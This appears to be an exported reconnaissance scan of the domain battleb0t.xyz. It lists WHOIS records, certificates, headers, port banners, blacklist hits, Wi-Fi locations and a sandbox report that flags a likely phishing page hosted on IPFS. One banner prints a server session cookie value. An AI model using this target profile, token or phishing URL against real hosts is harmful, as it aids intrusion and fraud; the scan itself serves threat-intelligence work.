| 2023-05-12 02:54:21 | HTTP Headers | No | Web Spider | 2 | 0 | 5 | 0 | None | {"x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "expires": "Fri, 12 May 2023 04:54:21 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "last-modified": "Fri, 28 Apr 2023 14:11:18 GMT", "connection": "keep-alive", "etag": "W/\"644bd406-1f4d\"", "cache-control": "max-age=7200, public", "date": "Fri, 12 May 2023 02:54:21 GMT", "cf-ray": "7c5f60688e300ce1-EWR", "content-type": "text/css", "x-frame-options": "DENY"} | http://vscode.battleb0t.xyz/cdn-cgi/styles/main.css |
| 2023-05-12 03:24:49 | Country | No | Country Name Extractor | 0 | 0 | 4 | 0 | None | United States | Domain Name: CLOUDFLARE.NET
Registry Domain ID: 1542998918_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: http://www.cloudflare.com
Updated Date: 2015-10-20T06:46:53Z
Creation Date: 2009-02-17T22:08:05Z
Registry Expiry Date: 2024-02-17T22:08:05Z
Registrar: CloudFlare, Inc.
Registrar IANA ID: 1910
Registrar Abuse Contact Email:
Registrar Abuse Contact Phone:
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited
Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
Domain Status: serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited
Name Server: NS1.CLOUDFLARE.NET
Name Server: NS2.CLOUDFLARE.NET
Name Server: NS3.CLOUDFLARE.NET
Name Server: NS4.CLOUDFLARE.NET
Name Server: NS5.CLOUDFLARE.NET
DNSSEC: signedDelegation
DNSSEC DS Data: 2371 13 2 90F710A107DA51ED78125D30A68704CF3C0308AFD01BFCD7057D4BD03B62C68B
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T02:59:31Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: CLOUDFLARE.NET
Registry Domain ID: 1542998918_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: https://www.cloudflare.com
Updated Date: 2022-03-16T19:39:08Z
Creation Date: 2009-02-17T22:08:05Z
Registrar Registration Expiration Date: 2024-02-17T22:08:05Z
Registrar: Cloudflare, Inc.
Registrar IANA ID: 1910
Domain Status: clientdeleteprohibited https://icann.org/epp#clientdeleteprohibited
Domain Status: clienttransferprohibited https://icann.org/epp#clienttransferprohibited
Domain Status: serverdeleteprohibited https://icann.org/epp#serverdeleteprohibited
Domain Status: servertransferprohibited https://icann.org/epp#servertransferprohibited
Domain Status: serverupdateprohibited https://icann.org/epp#serverupdateprohibited
Domain Status: clientupdateprohibited https://icann.org/epp#clientupdateprohibited
Registry Registrant ID:
Registrant Name: DATA REDACTED
Registrant Organization: DATA REDACTED
Registrant Street: DATA REDACTED
Registrant City: DATA REDACTED
Registrant State/Province: CA
Registrant Postal Code: DATA REDACTED
Registrant Country: US
Registrant Phone: DATA REDACTED
Registrant Phone Ext: DATA REDACTED
Registrant Fax: DATA REDACTED
Registrant Fax Ext: DATA REDACTED
Registrant Email: https://domaincontact.cloudflareregistrar.com/cloudflare.net
Registry Admin ID:
Admin Name: DATA REDACTED
Admin Organization: DATA REDACTED
Admin Street: DATA REDACTED
Admin City: DATA REDACTED
Admin State/Province: DATA REDACTED
Admin Postal Code: DATA REDACTED
Admin Country: DATA REDACTED
Admin Phone: DATA REDACTED
Admin Phone Ext: DATA REDACTED
Admin Fax: DATA REDACTED
Admin Fax Ext: DATA REDACTED
Admin Email: https://domaincontact.cloudflareregistrar.com/cloudflare.net
Registry Tech ID:
Tech Name: DATA REDACTED
Tech Organization: DATA REDACTED
Tech Street: DATA REDACTED
Tech City: DATA REDACTED
Tech State/Province: DATA REDACTED
Tech Postal Code: DATA REDACTED
Tech Country: DATA REDACTED
Tech Phone: DATA REDACTED
Tech Phone Ext: DATA REDACTED
Tech Fax: DATA REDACTED
Tech Fax Ext: DATA REDACTED
Tech Email: https://domaincontact.cloudflareregistrar.com/cloudflare.net
Registry Billing ID:
Billing Name: DATA REDACTED
Billing Organization: DATA REDACTED
Billing Street: DATA REDACTED
Billing City: DATA REDACTED
Billing State/Province: DATA REDACTED
Billing Postal Code: DATA REDACTED
Billing Country: DATA REDACTED
Billing Phone: DATA REDACTED
Billing Phone Ext: DATA REDACTED
Billing Fax: DATA REDACTED
Billing Fax Ext: DATA REDACTED
Billing Email: https://domaincontact.cloudflareregistrar.com/cloudflare.net
Name Server: ns1.cloudflare.net
Name Server: ns2.cloudflare.net
Name Server: ns3.cloudflare.net
Name Server: ns4.cloudflare.net
Name Server: ns5.cloudflare.net
DNSSEC: signedDelegation
Registrar Abuse Contact Email: registrar-abuse@cloudflare.com
Registrar Abuse Contact Phone: +1.4153197517
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T02:59:47Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Cloudflare provides more than 13 million domains with the tools to give their global users a faster, more secure, and more reliable internet experience.
NOTICE:
Data in the Cloudflare Registrar WHOIS database is provided to you by Cloudflare
under the terms and conditions at https://www.cloudflare.com/domain-registration-agreement/
By submitting this query, you agree to abide by these terms.
Register your domain name at https://www.cloudflare.com/registrar/
|
| 2023-05-12 03:24:48 | Country | No | Country Name Extractor | 0 | 0 | 3 | 0 | None | United States | +14806242505 |
| 2023-05-12 02:54:21 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | (raw Hybrid Analysis sandbox report dump omitted) | 185.199.109.153 |
| 2023-05-12 03:31:58 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.0:8080 | 188.114.97.0/24 |
| 2023-05-12 02:55:11 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset="utf-8"
Date: <REDACTED>
Cache-Control: no-cache, no-store, must-revalidate, private
Pragma: no-cache
Set-Cookie: whostmgrrelogin=no; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2086
Set-Cookie: whostmgrsession=%3a6IuBt4aiK1K5mEWt%2ce37772b57ce45a47eb222a7bbd7feb28; HttpOnly; path=/; port=2086
Set-Cookie: roundcube_sessid=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2086
Set-Cookie: roundcube_sessauth=expired; HttpOnly; domain=87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2086
Set-Cookie: Horde=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2086
Set-Cookie: horde_secret_key=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2086
Set-Cookie: Horde=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2086
Set-Cookie: Horde=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/horde; port=2086
Set-Cookie: PPA_ID=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2086
Set-Cookie: imp_key=expired; HttpOnly; domain=87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2086
Cache-Control: no-cache, no-store, must-revalidate, private
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Content-Encoding: gzip
Content-Length: 12420
| 87.248.157.102 |
| 2023-05-12 02:51:07 | Malicious IP Address | Yes | VirusTotal | 0 | 1 | 2 | 0 | None | VirusTotal [172.67.135.9]
https://www.virustotal.com/en/ip-address/172.67.135.9/information/ | 172.67.135.9 |
| 2023-05-12 03:08:47 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 104.196.30.225 | 104.196.30.220 |
| 2023-05-12 03:01:43 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.215): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:44:31 | Internet Name - Unresolved | No | DNS Resolver | 0 | 0 | 2 | 0 | None | tiktok.battleb0t.xyz | (raw certificate transparency log dump omitted) |
| 2023-05-12 03:00:32 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.22): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:01:15 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.135): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:56:56 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | kekw.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:62:27:a6:dc:16:28:de:ae:a0:a4:7d:7e:a0:02:81:25:0e
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 18 21:24:59 2022 GMT
Not After : Mar 18 21:24:58 2023 GMT
Subject: CN=kekw.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
1A:29:A0:EB:78:CC:40:89:5B:55:A3:66:D6:68:C3:AE:DF:AB:BB:78
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:kekw.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
a0:b0:46:e1:61:f3:0f:d5:bd:4b:02:c1:d6:75:b9:f8:08:3f:
64:70:3e:0a:8e:05:b2:6a:d5:2d:f4:c2:44:2e:a1:69:fc:5f:
a9:1c:d9:a6:04:60:12:75:b1:76:52:fb:f1:ff:75:9e:04:19:
67:aa:4f:00:aa:4d:57:a4:a3:68:1c:aa:cb:35:1d:41:8c:dc:
11:dd:f7:90:a2:ae:7c:e8:50:6f:3b:c0:1b:42:7c:1c:15:9c:
91:57:04:35:95:16:bb:4c:ff:22:e0:0c:44:a1:11:6c:76:07:
39:1f:59:4c:5d:c4:6b:b6:12:26:1e:1d:32:67:40:25:44:dc:
e3:1a:dc:31:b4:f1:92:10:ce:d6:3c:cd:02:c8:22:d7:81:50:
ea:ac:04:3b:1f:4b:51:ae:33:f4:24:8b:7f:2e:d9:ff:38:ef:
db:4c:3c:9b:ec:f5:3c:20:af:9a:a6:6e:49:52:0d:57:8a:fe:
12:8f:6b:6e:14:14:d7:22:a3:1b:92:9c:e8:00:cd:fb:2f:a9:
04:b2:c9:5f:ce:7b:7e:43:9a:5c:9d:bc:db:c0:27:6e:61:a2:
00:b8:76:ec:1b:e2:30:04:0a:2e:39:6e:d4:82:d8:1e:28:94:
6b:51:10:7b:2b:3f:22:2b:a5:a4:34:1d:1e:d0:b6:84:c0:7c:
de:7e:13:7e
|
| 2023-05-12 02:44:24 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | github.com | 185.199.109.153 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | draadloos (Net ID: 00:01:E3:4A:CD:74) | 52.3759, 4.8975 |
| 2023-05-12 02:59:51 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | jloup@gzip.org | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://ocjfkdlaerq2jj64fpowvb2o3gv7gd5gvqzit3xbp6hazs5a-ipfs-dweb-link.translate.goog/?_x_tr_hp=bafybeia3mp&_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-US&_x_tr_pto=wapp#kantonsen%40encoded.com', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_ad0_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_ad0_IESQMMUTEX_0_519"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\VERMGMTBlockListFileMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_ad0_IE_EarlyTabStart_0x588_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_ad0_IESQMMUTEX_0_303"\n "IsoScope_ad0_IESQMMUTEX_0_331"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_ad0_ConnHashTable<2768>_HashTable_Mutex"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2768"\n "Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': 
u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"142.251.214.129:443"\n "142.251.214.131:443"\n "142.250.189.238:443"\n "185.199.111.153:443"\n "69.16.175.10:443"\n "142.250.189.234:443"\n "184.27.80.18:443"\n "52.155.62.95:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"code.jquery.com"\n "lipis.github.io"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'".fa-cc-paypal:before {" (Indicator: "paypal")\n ".fa-paypal:before {" (Indicator: "paypal")\n ".fa-twitter-square:before {" (Indicator: "twitter")\n ".fa-twitter:before {" (Indicator: "twitter")\n ".fa-youtube-play:before {" (Indicator: "youtube")\n ".fa-youtube-square:before {" (Indicator: "youtube")\n ".fa-youtube:before {" (Indicator: "youtube")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': 
u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "m_el_main_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "_D809339D-C99C-11ED-A84C-080027C98DFF_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "font-awesome_1_.css" has type "troff or preprocessor input ASCII text with very long lines"- [targetUID: N/A]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "RecoveryStore._D809339B-C99C-11ED-A84C-080027C98DFF_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "X2WYMCV5.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\X2WYMCV5.txt]- [targetUID: 00000000-00002768]\n "DEW9N13E.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\DEW9N13E.txt]- [targetUID: 00000000-00003116]\n "_E2C1FED7-C99C-11ED-A84C-080027C98DFF_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "1NX8I2I6.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\1NX8I2I6.txt]- [targetUID: 00000000-00002768]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "UX69Y2OK.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\UX69Y2OK.txt]- [targetUID: 00000000-00003116]\n "BQ7YREAH.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\BQ7YREAH.txt]- [targetUID: 00000000-00003116]\n "~DF7ADEEE89A7F7CB7A.TMP" has type "data"- Location: [%TEMP%\\~DF7ADEEE89A7F7CB7A.TMP]- [targetUID: 00000000-00002768]\n "C1BNT20A.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\C1BNT20A.txt]- [targetUID: 00000000-00002768]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document 
Cannot read section info"- [targetUID: N/A]\n "favicon_3_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "favicon_4_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "m_navigationui_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002768]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://www.google.com/support/translate+(en==Hn?:#googtrans/en/+Hn);var"\n Pattern match: "https://www.google.com/tools/feedback},Tw=function(a){return"\n Pattern match: "https://github.com/madler/zlib/blob/master/zlib.h"\n Pattern match: "https://www.google.com/images/cleardot.gif"\n Pattern match: "https://==Pn?V.Gh:null};this.Z={qb:Un,xd:null};a&&"\n Pattern match: "V.Pb/\ufffd\u0331"\n Pattern match: "http://fontawesome.io"\n Pattern match: "http://fontawesome.io/license"\n Pattern match: "http://jquery.com/"\n Pattern match: "http://jquery.org/license"\n Pattern match: "http://sizzlejs.com/"\n Pattern match: "https://www&google.com/images/zippy_minus_sm.gif"\n Pattern match: "http://www.w3.org/TR/selectors/#attribute-selectors"\n Pattern match: "http://www.w3.org/TR/css3-selectors/#attribute-selectors"\n Pattern match: "https://developer.mozilla.org/en/Security/CSP"\n Pattern match: "http://www.w3.org/TR/CSS21/syndata.html#escaped-characters"\n Pattern match: "http://bugs.jquery.com/ticket/12282#comment:15"\n Pattern match: "http://blindsignals.com/index.php/2009/07/jquery-delay/"\n Pattern match: "http://bugs.jquery.com/ticket/12359"\n Pattern match: 
"http://erik.eae.net/archives/2007/07/27/18.54.15/#comment-102291"\n Pattern match: "http://fluidproject.org/blog/2008/01/09/getting-setting-and-removing-tabindex-values-with-javascript/"\n Pattern match: "http://helpful.knobs-dials.com/index.php/Component_returned_failure_code:_0x80040111_(NS_ERROR_NOT_AVAILABLE)"\n Pattern match: "http://javascript.nwbox.com/IEContentLoaded/"\n Pattern match: "http://msdn.microsoft.com/en-us/library/ms536429%28VS.85%29.aspx"\n Pattern match: "http://weblogs.java.net/blog/driscoll/archive/2009/09/08/eval-javascript-global-context"\n Pattern match: "http://www.w3.org/TR/2003/WD-DOM-Level-3-Events-20030331/ecma-script-binding.html"\n Pattern match: "http://www.w3.org/TR/2011/REC-css3-selectors-20110929/#checked"\n Pattern match: "http://www.w3.org/TR/css3-syntax/#characters"\n Pattern match: "http://www.w3.org/TR/selectors/#empty-pseudo"\n Pattern match: "http://www.w3.org/TR/selectors/#lang-pseudo"\n Pattern match: "http://www.w3.org/TR/selectors/#pseudo-classes"\n Pattern match: "https://github.com/jquery/jquery/pull/764"\n Pattern match: "http://json.org/json2.js"\n Pattern match: "https://bugzilla.mozilla.org/show_bug.cgi?id=491668"\n Pattern match: "http://www.w3.org/TR/CSS21/syndata.html#value-def-identifier"\n Pattern match: "https://developer.mozilla.org/en-US/docs/CSS/display"\n Pattern match: "https://bugzilla.mozilla.org/show_bug.cgi?id=649285"\n Pattern match: "http://dev.w3.org/csswg/cssom/#resolved-values"\n Pattern match: "http://jsperf.com/getall-vs-sizzle/2"\n Pattern match: "https://bugs.webkit.org/show_bug.cgi?id=29084"\n Pattern match: "http://www.w3.org/TR/css3-selectors/#whitespace"\n Pattern match: "https://bafybeia3mpocjfkdlaerq2jj64fpowvb2o3gv7gd5gvqzit3xbp6hazs5a.ipfs.dweb.link/"\n Pattern match: "https://translate.google.com/translate_a/element.js?cb=gtElInit&hl=en-US&client=wt"\n Pattern match: 
"https://www.gstatic.com/_/translate_http/_/js/k=translate_http.tr.en_US.lnL0vnRtVr0.O/d=1/exm=corsproxy/ed=1/rs=AN8SPfpNemcmzo34-pN0j2bNnO1xZF-3PQ/m=navigationui"\n Pattern match: "https://www.gstatic.com/_/translate_http/_/js/k=translate_http.tr.en_US.lnL0vnRtVr0.O/d=1/rs=AN8SPfpNemcmzo34-pN0j2bNnO1xZF-3PQ/m=corsproxy"\n Pattern match: "https://ocjfkdlaerq2jj64fpowvb2o3gv7gd5gvqzit3xbp6hazs5a-ipfs-dweb-link.translate.goog\\]]],null,null,null,null,null,null,-3600,null,null,null,null,[],1,nu |
| 2023-05-12 03:11:20 | Physical Coordinates | No | AbstractAPI | 0 | 0 | 3 | 0 | None | 50.1188, 8.6843 | 165.232.113.85 |
| 2023-05-12 02:57:24 | Internet Name | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | nwapi.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 02:47:55 | SSL Certificate - Raw Data | No | Certificate Transparency | 2 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:02:6d:eb:8d:63:78:04:f2:b8:5c:db:39:06:ab:26:ed:a9
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Mar 15 23:40:10 2023 GMT
Not After : Jun 13 23:40:09 2023 GMT
Subject: CN=funny.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
04:75:15:09:c5:81:bb:98:d9:cd:95:bf:a9:c2:90:
49:7e:c9:d9:5b:ca:38:d9:40:de:af:17:a2:51:84:
18:c1:ec:ed:c3:d5:19:f0:4f:41:01:a3:0d:ed:ef:
4f:5a:04:c7:16:79:5d:fa:96:dc:2a:ec:4f:7c:34:
46:4c:ee:fd:f2
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
76:6F:61:1C:BE:F6:0B:43:74:69:9A:F6:F2:62:F9:6E:CA:07:05:76
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:funny.battleb0t.xyz, DNS:pics.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
3c:23:1a:4a:59:35:02:c1:c6:ee:ce:b0:90:2b:32:ff:c3:73:
00:60:2e:9e:f9:30:da:4e:15:e2:5a:99:e8:dc:18:9e:39:ed:
69:f1:83:a4:0a:04:28:db:64:81:bf:64:61:e9:65:9c:4b:bf:
43:b4:21:89:ab:e2:5c:b4:ea:8e:55:b3:f4:e4:d9:42:3e:20:
e0:83:2a:75:f9:b5:2c:98:6f:90:e7:e4:4a:86:e5:ab:f3:97:
c8:a9:85:ff:6a:e9:35:8d:3d:30:f6:db:5e:e0:f1:27:f3:d3:
e7:f7:29:be:31:75:49:43:f6:99:93:6d:06:65:d1:3e:4c:29:
66:fd:2f:93:e9:c6:ec:30:8a:f2:58:08:03:45:02:a0:57:b1:
3b:0b:b4:a9:ed:aa:8b:9f:ac:43:5a:55:10:bb:1e:31:d5:e4:
c1:37:cd:22:a3:bd:26:b6:f1:01:e1:68:e2:c6:50:80:44:4b:
cd:a0:4a:80:cc:93:e4:1b:7e:d7:af:21:2c:ce:f2:c1:d0:70:
17:ad:3a:29:15:d4:b9:ee:11:c8:aa:7f:fa:b4:9a:33:05:ef:
47:de:10:55:c2:f1:9f:19:e4:ad:0a:83:ff:a1:86:3d:18:bd:
73:d4:39:8b:bb:51:02:17:cb:89:c6:27:d9:b8:f2:7c:d7:bd:
a5:b5:9a:11
| battleb0t.xyz |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | oconnell (Net ID: 00:02:2D:2F:3E:1F) | 34.0544, -118.244 |
| 2023-05-12 03:32:15 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.8:443 | 188.114.97.0/24 |
| 2023-05-12 03:01:41 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.196): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:51 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"Date": ["<REDACTED>"], "_encoding": {"Date": "DISPLAY_UTF8", "Content_Length": "DISPLAY_UTF8", "X_Nf_Request_Id": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8"}, "Content_Length": ["0"], "X_Nf_Request_Id": ["01H06G1NS24K8856E7B6C2JF02"], "Server": ["Netlify"]} | 34.74.170.74 |
| 2023-05-12 03:00:36 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | 28efa154c841448e9e98cc948672b2d4.protect@withheldforprivacy.com | Domain Name: CLOUDWAYSAPPS.COM
Registry Domain ID: 1695307151_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 2022-09-12T18:44:13Z
Creation Date: 2012-01-04T12:17:34Z
Registry Expiry Date: 2028-01-04T12:17:34Z
